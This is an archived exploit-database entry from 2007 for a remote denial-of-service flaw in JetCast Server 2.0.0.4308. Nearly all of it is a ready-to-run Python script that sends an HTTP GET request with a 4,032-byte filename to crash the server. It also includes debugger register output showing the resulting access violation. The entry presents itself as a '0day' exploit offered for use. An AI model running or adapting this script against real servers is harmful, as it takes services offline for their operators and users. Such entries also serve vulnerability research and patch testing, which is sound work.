JetCast Server 2.0.0.4308 - Remote Denial of Service

EDB-ID:

4403


Author:

vCore

Type:

dos


Platform:

Windows

Date:

2007-09-13


#!/usr/bin/python
"""     ____
__   __/ ___|___  _ __ ___
\ \ / / |   / _ \| '__/ _ \
 \ V /| |__| (_) | | |  __/
 \_/  \____\___/|_|  \___|     _
 _ __  _ __ ___  ___  ___ _ __ | |_ ___   _
| '_ \| '__/ _ \/ __|/ _ \ '_ \| __/ __| |_|
| |_) | | |  __/\__ \  __/ | | | |_\__ \  _
| .__/|_|  \___||___/\___|_| |_|\__|___/ |_|
|_|        _
      _  //
      \\//
GENRE: //\\PLOIT
     //  `
PROGRAM: JetCast Server 2.0.0.4308
EXPLOiT TYPE: 0day remote DoS exploit
EXPLOiT LANGUAGE: Python
DEBUG iNFO: [Module JSMP3OGG]
           EAX 100355B8 JSMP3OGG.100355B8
           ECX 00000007
           EDX 00002000
           EBX 00CB415A
           ESP 00DCDEC0
           EBP 00DCDECC
           ESI 00000000
           EDI 1002FA64 ASCII "Mozilla"
           EIP 1002737C JSMP3OGG.1002737C

           MOV AH,BYTE PTR DS:[ESI]; C0000005 (ACCESS VIOLATION)

Bug found / exploit written by vCore <share0005@o2.pl>
Tested on JetCast Server 2.0.0.4308 - Windows XP ServicePack2
 ____          _
 / ___|_     __| | ___   _
| |   / _ \ / _` |/ _ \ |_|
| |__| (_) | (_| |  __/  _
 \____\___/ \__,_|\___| |_|

"""
from time import sleep
from socket import *

target = '127.0.0.1'
port = 8000
buf = "A" * 4032

header = (
   'GET /%s.mp3 HTTP/1.0\r\n'
   'Host: %s\r\n'
   'User-Agent: WinampMPEG/5.19\r\n'
   'Accept: */*\r\n'
   'Icy-MetaData:1\r\n'
   'Connection: close\r\n') % (buf, target)

s = socket(AF_INET, SOCK_STREAM)
s.connect((target, port))
s.send(header)
sleep(2)
s.close()

print "DONE"

# milw0rm.com [2007-09-13]